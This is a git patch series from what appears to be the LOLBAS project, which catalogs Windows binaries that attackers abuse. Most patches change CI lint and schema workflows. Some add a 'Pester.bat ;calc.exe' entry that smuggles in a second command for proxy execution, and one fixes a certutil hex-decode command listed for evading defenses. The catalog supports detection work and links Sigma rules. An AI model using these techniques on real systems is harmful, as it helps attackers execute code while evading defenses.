From fdc1b2c82759f25417c3cedf9ee88d0ce7c1968e Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:44:57 +0200 Subject: [PATCH 01/60] Update pester.bat with an additional example --- yml/OSScripts/pester.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 7d525f8..d3e8b04 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,13 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + - Command: Pester.bat ;calc.exe + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat @@ -20,7 +27,10 @@ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 + - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' + - Person: Stamatis Chatzimangou + Handle: '@_st0pp3r_' --- From c53a8ea06eb982932ca65c05786d3fe83864d79b Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:47:17 +0200 Subject: [PATCH 02/60] Adjusted comment in command --- yml/OSScripts/pester.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index d3e8b04..96c1fb4 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution Category: Execute Privileges: User From 68a6f0a35f30edc58d59e46ddaf8f35cda958592 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 24 Aug 2022 12:32:48 +0200 Subject: [PATCH 03/60] added sigma detection for pester --- yml/OSScripts/pester.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 96c1fb4..bc19377 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -25,6 +25,7 @@ Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 From 68c14b894cb29ca1c90036eee88f33d7a7aad70f Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Fri, 2 Sep 2022 13:42:59 -0400 Subject: [PATCH 04/60] Update UtilityFunctions.yml (#228) --- yml/OSScripts/UtilityFunctions.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 4850278..b4908a6 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -16,6 +16,7 @@ Full_Path: Code_Sample: - Code: Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: - Link: https://twitter.com/nickvangilder/status/1441003666274668546 Acknowledgement: From 8810e30f0ab63a126f2ac9ef129c31eee763f1a3 Mon Sep 17 00:00:00 2001 From: Ryan Stamp <32468510+mhogar@users.noreply.github.com> Date: Fri, 2 Sep 2022 13:44:23 -0400 Subject: [PATCH 05/60] Fix incorrect decodehex command syntax (#230) --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index f31d2f7..be67802 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -39,7 +39,7 @@ Commands: Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName + - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode From 167ae89d1ca73fa436704c79d8cbbbe0809ceef5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 07:02:01 -0400 Subject: [PATCH 06/60] update yaml-lint --- .github/workflows/yaml-linting.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 7b71b07..c0002d4 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -14,6 +14,4 @@ jobs: steps: - uses: actions/checkout@v1 - name: yaml-lint - uses: ibiqlik/action-yamllint@v3 - with: - config_file: .github/.yamllint + uses: ibiqlik/action-yamllint@v3.1.0 From 68aff842918797c26b2d8cb352e62dac7d97a3aa Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 07:22:41 -0400 Subject: [PATCH 07/60] adding config --- .github/workflows/yaml-linting.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index c0002d4..2def112 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -15,3 +15,5 @@ jobs: - uses: actions/checkout@v1 - name: yaml-lint uses: ibiqlik/action-yamllint@v3.1.0 + with: + config_file: .github/.yamllint From f64f0d457ecb637737545ab4eca657a1539f9ba8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 16:38:40 -0400 Subject: [PATCH 08/60] Changing linter --- .github/workflows/yaml-linting.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 2def112..74da602 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -12,8 +12,8 @@ jobs: lintFiles: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v1 - - name: yaml-lint - uses: ibiqlik/action-yamllint@v3.1.0 + - uses: actions/checkout + - name: Run yamllint + uses: frenck/action-yamllint with: - config_file: .github/.yamllint + config: ".github/.yamllint" From 4990f5e81d8ccadfa6feaec0e457edf651c19af5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 16:42:26 -0400 Subject: [PATCH 09/60] fixing workflow --- .github/workflows/yaml-linting.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 74da602..06ea00b 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -12,8 +12,8 @@ jobs: lintFiles: runs-on: ubuntu-latest steps: - - uses: actions/checkout + - uses: actions/checkout@v3 - name: Run yamllint - uses: frenck/action-yamllint + uses: frenck/action-yamllint@v1 with: config: ".github/.yamllint" From 26c7c404135f2aaf8512d503a8ce658f8d1bf51e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:06:21 -0400 Subject: [PATCH 10/60] changing linter --- .github/workflows/yaml-linting.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 06ea00b..5b593fc 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -14,6 +14,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Run yamllint - uses: frenck/action-yamllint@v1 + uses: reviewdog/action-yamllint@v1 with: - config: ".github/.yamllint" + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint' From c64d355075a395db296211e21feeb443fd43b5c8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:17:55 -0400 Subject: [PATCH 11/60] lint changes for push --- .github/workflows/yaml-lint-reviewdog.yml | 17 +++++++++++++++++ .github/workflows/yaml-linting.yml | 17 +++++------------ 2 files changed, 22 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/yaml-lint-reviewdog.yml diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml new file mode 100644 index 0000000..3cd1dd7 --- /dev/null +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -0,0 +1,17 @@ +--- +name: YAML Lint with reviewdog +on: + pull_request: + branches: + - master + +jobs: + lintFiles: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Run yamllint + uses: reviewdog/action-yamllint@v1 + with: + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint' diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5b593fc..e4ca1bc 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,20 +1,13 @@ --- -name: YAML Lint -on: - push: - branches: - - master - pull_request: - branches: - - master +name: YAML Lint Push Check +on: [push] jobs: lintFiles: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Run yamllint - uses: reviewdog/action-yamllint@v1 + - name: Frenck's yamllint + uses: frenck/action-yamllint@v1 with: - reporter: github-pr-review # Change reporter. - yamllint_flags: '--config-file .github/.yamllint' + config: ".github/.yamllint" From e25a0e7cb84f3b735b666bef403dae170e1d3ef4 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:24:38 -0400 Subject: [PATCH 12/60] lint changes for push --- .github/workflows/yaml-linting.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index e4ca1bc..8194a73 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -10,4 +10,4 @@ jobs: - name: Frenck's yamllint uses: frenck/action-yamllint@v1 with: - config: ".github/.yamllint" + config: "./.github/.yamllint" From f6761fad95abb8b8352690a87c2e5eb22ac670bd Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:33:11 -0400 Subject: [PATCH 13/60] restoring push yamllint action --- .github/workflows/yaml-linting.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 8194a73..2150f0e 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Frenck's yamllint - uses: frenck/action-yamllint@v1 + - name: yaml-lint + uses: ibiqlik/action-yamllint@v3 with: - config: "./.github/.yamllint" + config_file: .github/.yamllint From 9955d4ea77b40537e3f2adbd34796150cadfd832 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:03:38 -0400 Subject: [PATCH 14/60] Adding pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 16 ++++ YML-Schema.yml | 92 ++++++++++++++++++++++ 2 files changed, 108 insertions(+) create mode 100644 .github/workflows/validate-yaml-schema.yml create mode 100644 YML-Schema.yml diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml new file mode 100644 index 0000000..666c411 --- /dev/null +++ b/.github/workflows/validate-yaml-schema.yml @@ -0,0 +1,16 @@ +name: Validate YAML Schema + +on: [push, pull_request] + +jobs: + build: + + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v3 + - name: Validate YAML Schema + uses: eliezio/action-pykwalify@v0.3 + with: + files: yml/*/*.yml + schema: YML-Schema.yml diff --git a/YML-Schema.yml b/YML-Schema.yml new file mode 100644 index 0000000..0fb7481 --- /dev/null +++ b/YML-Schema.yml @@ -0,0 +1,92 @@ +--- +type: map +mapping: +# Id field enhancement possibility commenting out for now +# "Id": +# type: str +# required: yes +# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' + "Name": + type: str + required: yes + "Description": + type: str + required: yes + "Author": + type: str + required: yes + "Created": + type: str + required: yes + "Commands": + type: seq + sequence: + - type: map + mapping: + "Command": + type: str + required: yes + "Description": + type: str + required: yes + "Usecase": + type: str + required: yes + "Category": + type: str + required: yes + enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload] + "Privileges": + type: str + required: yes + "MitreID": + type: str + required: yes + pattern: 'T[0-9]{4}' + "OperatingSystem": + type: str + required: yes + "Full_Path": + type: seq + required: yes + sequence: + - type: map + mapping: + "Path": + type: str + required: yes + "Code_Sample": + type: seq + required: yes + sequence: + - type: map + mapping: + "Code": + type: str + "Detection": + type: seq + required: yes + sequence: + - type: map + mapping: + "IOC": + type: str + "Resources": + type: seq + required: yes + sequence: + - type: map + mapping: + "Link": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Acknowledgement": + type: seq + required: yes + sequence: + - type: map + mapping: + "Person": + type: str + "Handle": + type: str From 73d02562cd3c2a5ba1d77d519c69e73d6abce747 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:05:47 -0400 Subject: [PATCH 15/60] Attempting to fix pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 666c411..c95f974 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -10,7 +10,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: eliezio/action-pykwalify@v1 with: files: yml/*/*.yml schema: YML-Schema.yml From 059f2419df8c82b9d20a6cdd9734b4a2c8742ccc Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:08:58 -0400 Subject: [PATCH 16/60] Attempting to fix pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index c95f974..fab996e 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -9,8 +9,23 @@ jobs: steps: - uses: actions/checkout@v3 - - name: Validate YAML Schema + - name: Validate OSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 with: - files: yml/*/*.yml + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From 285ef35e9b078b9f0f5f9c4bedf1e138188686c0 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:11:14 -0400 Subject: [PATCH 17/60] fixing indents --- .github/workflows/validate-yaml-schema.yml | 24 +++++++++++----------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index fab996e..3ea3364 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -11,21 +11,21 @@ jobs: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml - name: Validate OSScripts YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml From 3e57bc35c7a8cb5164a098c64a06a73f3756b618 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:13:35 -0400 Subject: [PATCH 18/60] fixing versions --- .github/workflows/validate-yaml-schema.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 3ea3364..559da82 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -10,22 +10,22 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From 0afb54868ae3c7b232472c9254afdaddd08aa064 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:19:30 -0400 Subject: [PATCH 19/60] Changing to proposed fixed checker cketti/action-pykwalify@v0.3-temp-fix --- .github/workflows/validate-yaml-schema.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 559da82..0ebaa39 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -10,22 +10,22 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From ce36f924fc40f5ec6e4f4f8299aa3eb1dbf85701 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:16:47 -0400 Subject: [PATCH 20/60] Removing extra --- from each yaml file --- Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml | 1 - Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml | 1 - Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml | 1 - Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml | 1 - yml/OSBinaries/AppInstaller.yml | 1 - yml/OSBinaries/Aspnet_Compiler.yml | 1 - yml/OSBinaries/At.yml | 1 - yml/OSBinaries/Atbroker.yml | 1 - yml/OSBinaries/Bash.yml | 1 - yml/OSBinaries/Bitsadmin.yml | 1 - yml/OSBinaries/Certoc.yml | 1 - yml/OSBinaries/Certreq.yml | 1 - yml/OSBinaries/Certutil.yml | 1 - yml/OSBinaries/Cmd.yml | 1 - yml/OSBinaries/Cmdkey.yml | 1 - yml/OSBinaries/Cmdl32.yml | 1 - yml/OSBinaries/Cmstp.yml | 1 - yml/OSBinaries/ConfigSecurityPolicy.yml | 1 - yml/OSBinaries/Conhost.yml | 1 - yml/OSBinaries/Control.yml | 1 - yml/OSBinaries/Csc.yml | 1 - yml/OSBinaries/Cscript.yml | 1 - yml/OSBinaries/DataSvcUtil.yml | 1 - yml/OSBinaries/Desktopimgdownldr.yml | 1 - yml/OSBinaries/Dfsvc.yml | 1 - yml/OSBinaries/Diantz.yml | 1 - yml/OSBinaries/Diskshadow.yml | 1 - yml/OSBinaries/Dnscmd.yml | 1 - yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Eventvwr.yml | 1 - yml/OSBinaries/Expand.yml | 1 - yml/OSBinaries/Explorer.yml | 1 - yml/OSBinaries/Extexport.yml | 1 - yml/OSBinaries/Extrac32.yml | 1 - yml/OSBinaries/Findstr.yml | 1 - yml/OSBinaries/Finger.yml | 1 - yml/OSBinaries/FltMC.yml | 1 - yml/OSBinaries/Forfiles.yml | 1 - yml/OSBinaries/Ftp.yml | 1 - yml/OSBinaries/GfxDownloadWrapper.yml | 1 - yml/OSBinaries/Gpscript.yml | 1 - yml/OSBinaries/Hh.yml | 1 - yml/OSBinaries/IMEWDBLD.yml | 1 - yml/OSBinaries/Ie4uinit.yml | 1 - yml/OSBinaries/Ieexec.yml | 1 - yml/OSBinaries/Ilasm.yml | 1 - yml/OSBinaries/Infdefaultinstall.yml | 1 - yml/OSBinaries/Installutil.yml | 1 - yml/OSBinaries/Jsc.yml | 1 - yml/OSBinaries/Makecab.yml | 1 - yml/OSBinaries/Mavinject.yml | 1 - yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 1 - yml/OSBinaries/Mmc.yml | 1 - yml/OSBinaries/MpCmdRun.yml | 1 - yml/OSBinaries/Msbuild.yml | 1 - yml/OSBinaries/Msconfig.yml | 1 - yml/OSBinaries/Msdt.yml | 1 - yml/OSBinaries/Mshta.yml | 1 - yml/OSBinaries/Msiexec.yml | 1 - yml/OSBinaries/Netsh.yml | 1 - yml/OSBinaries/Odbcconf.yml | 1 - yml/OSBinaries/OfflineScannerShell.yml | 1 - yml/OSBinaries/OneDriveStandaloneUpdater.yml | 1 - yml/OSBinaries/Pcalua.yml | 1 - yml/OSBinaries/Pcwrun.yml | 1 - yml/OSBinaries/Pktmon.yml | 1 - yml/OSBinaries/Pnputil.yml | 1 - yml/OSBinaries/Presentationhost.yml | 1 - yml/OSBinaries/Print.yml | 1 - yml/OSBinaries/PrintBrm.yml | 1 - yml/OSBinaries/Psr.yml | 1 - yml/OSBinaries/Rasautou.yml | 1 - yml/OSBinaries/Rdrleakdiag.yml | 1 - yml/OSBinaries/Reg.yml | 1 - yml/OSBinaries/Regasm.yml | 1 - yml/OSBinaries/Regedit.yml | 1 - yml/OSBinaries/Regini.yml | 1 - yml/OSBinaries/Register-cimprovider.yml | 1 - yml/OSBinaries/Regsvcs.yml | 1 - yml/OSBinaries/Regsvr32.yml | 1 - yml/OSBinaries/Replace.yml | 1 - yml/OSBinaries/Rpcping.yml | 1 - yml/OSBinaries/Rundll32.yml | 1 - yml/OSBinaries/Runonce.yml | 1 - yml/OSBinaries/Runscripthelper.yml | 1 - yml/OSBinaries/Sc.yml | 1 - yml/OSBinaries/Schtasks.yml | 1 - yml/OSBinaries/Scriptrunner.yml | 1 - yml/OSBinaries/SettingSyncHost.yml | 1 - yml/OSBinaries/Stordiag.yml | 1 - yml/OSBinaries/Syncappvpublishingserver.yml | 1 - yml/OSBinaries/Ttdinject.yml | 1 - yml/OSBinaries/Tttracer.yml | 1 - yml/OSBinaries/Vbc.yml | 1 - yml/OSBinaries/Verclsid.yml | 1 - yml/OSBinaries/Wab.yml | 1 - yml/OSBinaries/Wlrmdr.yml | 1 - yml/OSBinaries/Wmic.yml | 1 - yml/OSBinaries/WorkFolders.yml | 1 - yml/OSBinaries/Wscript.yml | 1 - yml/OSBinaries/Wsreset.yml | 1 - yml/OSBinaries/Wuauclt.yml | 1 - yml/OSBinaries/Xwizard.yml | 1 - yml/OSLibraries/Advpack.yml | 1 - yml/OSLibraries/Desk.yml | 1 - yml/OSLibraries/Dfshim.yml | 1 - yml/OSLibraries/Ieadvpack.yml | 1 - yml/OSLibraries/Ieframe.yml | 1 - yml/OSLibraries/Mshtml.yml | 1 - yml/OSLibraries/Pcwutl.yml | 1 - yml/OSLibraries/Setupapi.yml | 1 - yml/OSLibraries/Shdocvw.yml | 1 - yml/OSLibraries/Shell32.yml | 1 - yml/OSLibraries/Syssetup.yml | 1 - yml/OSLibraries/Url.yml | 1 - yml/OSLibraries/Zipfldr.yml | 1 - yml/OSLibraries/comsvcs.yml | 1 - yml/OSScripts/CL_LoadAssembly.yml | 1 - yml/OSScripts/CL_mutexverifiers.yml | 1 - yml/OSScripts/Cl_invocation.yml | 1 - yml/OSScripts/Manage-bde.yml | 1 - yml/OSScripts/Pubprn.yml | 1 - yml/OSScripts/Syncappvpublishingserver.yml | 1 - yml/OSScripts/UtilityFunctions.yml | 1 - yml/OSScripts/Winrm.yml | 1 - yml/OSScripts/pester.yml | 1 - yml/OtherMSBinaries/AccCheckConsole.yml | 1 - yml/OtherMSBinaries/Adplus.yml | 1 - yml/OtherMSBinaries/Agentexecutor.yml | 1 - yml/OtherMSBinaries/Appvlp.yml | 1 - yml/OtherMSBinaries/Bginfo.yml | 1 - yml/OtherMSBinaries/Cdb.yml | 1 - yml/OtherMSBinaries/Coregen.yml | 1 - yml/OtherMSBinaries/Csi.yml | 1 - yml/OtherMSBinaries/DefaultPack.yml | 1 - yml/OtherMSBinaries/Devtoolslauncher.yml | 1 - yml/OtherMSBinaries/Dnx.yml | 1 - yml/OtherMSBinaries/Dotnet.yml | 1 - yml/OtherMSBinaries/Dump64.yml | 1 - yml/OtherMSBinaries/Dxcap.yml | 1 - yml/OtherMSBinaries/Excel.yml | 1 - yml/OtherMSBinaries/Fsi.yml | 1 - yml/OtherMSBinaries/FsiAnyCpu.yml | 1 - yml/OtherMSBinaries/Mftrace.yml | 1 - yml/OtherMSBinaries/Msdeploy.yml | 1 - yml/OtherMSBinaries/Msxsl.yml | 1 - yml/OtherMSBinaries/Ntdsutil.yml | 1 - yml/OtherMSBinaries/Powerpnt.yml | 1 - yml/OtherMSBinaries/Procdump.yml | 1 - yml/OtherMSBinaries/Rcsi.yml | 1 - yml/OtherMSBinaries/Remote.yml | 1 - yml/OtherMSBinaries/Sqldumper.yml | 1 - yml/OtherMSBinaries/Sqlps.yml | 1 - yml/OtherMSBinaries/Sqltoolsps.yml | 1 - yml/OtherMSBinaries/Squirrel.yml | 1 - yml/OtherMSBinaries/Te.yml | 1 - yml/OtherMSBinaries/Tracker.yml | 1 - yml/OtherMSBinaries/Update.yml | 1 - yml/OtherMSBinaries/VSIISExeLauncher.yml | 1 - yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 1 - yml/OtherMSBinaries/Vsjitdebugger.yml | 1 - yml/OtherMSBinaries/Wfc.yml | 1 - yml/OtherMSBinaries/Winword.yml | 1 - yml/OtherMSBinaries/Wsl.yml | 1 - 164 files changed, 164 deletions(-) diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml index 5e5b5da..d6a530b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml index a95c37f..50c121b 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml +++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Bart Handle: '@bartblaze' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml index c6b5dc5..929443e 100644 --- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml +++ 